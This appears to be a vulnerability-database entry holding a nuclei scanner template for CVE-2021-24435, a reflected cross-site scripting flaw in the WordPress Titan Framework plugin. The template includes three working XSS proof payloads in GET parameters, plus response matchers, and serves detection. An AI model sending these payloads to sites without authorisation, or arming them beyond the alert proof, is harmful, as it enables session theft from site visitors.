Lucene search
K

WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 38 Views

WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting. Font-weight and font-family GET parameters not properly escaped in iframe-font-preview.php, leading to Reflected Cross-Site Scripting issues

Related
Refs
Code
id: CVE-2021-24435

info:
  name: WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting
  author: xcapri,ritikchaddha
  severity: medium
  description: |
    The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Fixed in version 2.7.12
  reference:
    - https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24435
    - https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24435
    cwe-id: CWE-79
    epss-score: 0.01785
    epss-percentile: 0.75627
    cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: gambit
    product: titan_framework
    framework: wordpress
  tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27"
      - "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27"
      - "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: regex
        regex:
          - (?i)(onerror=|onclick=)['"]?alert\(document\.domain\)['"]?
          - '<p>Grumpy wizards make'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b2034826823ce1040cc585aeb99ea2531e6e7b786a673e903a5a2c3b6a83ce7a02202efc774e47c5a041be392dd9ccdfc46882df1554b2df274ab4bd394ad1843521:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.01785
38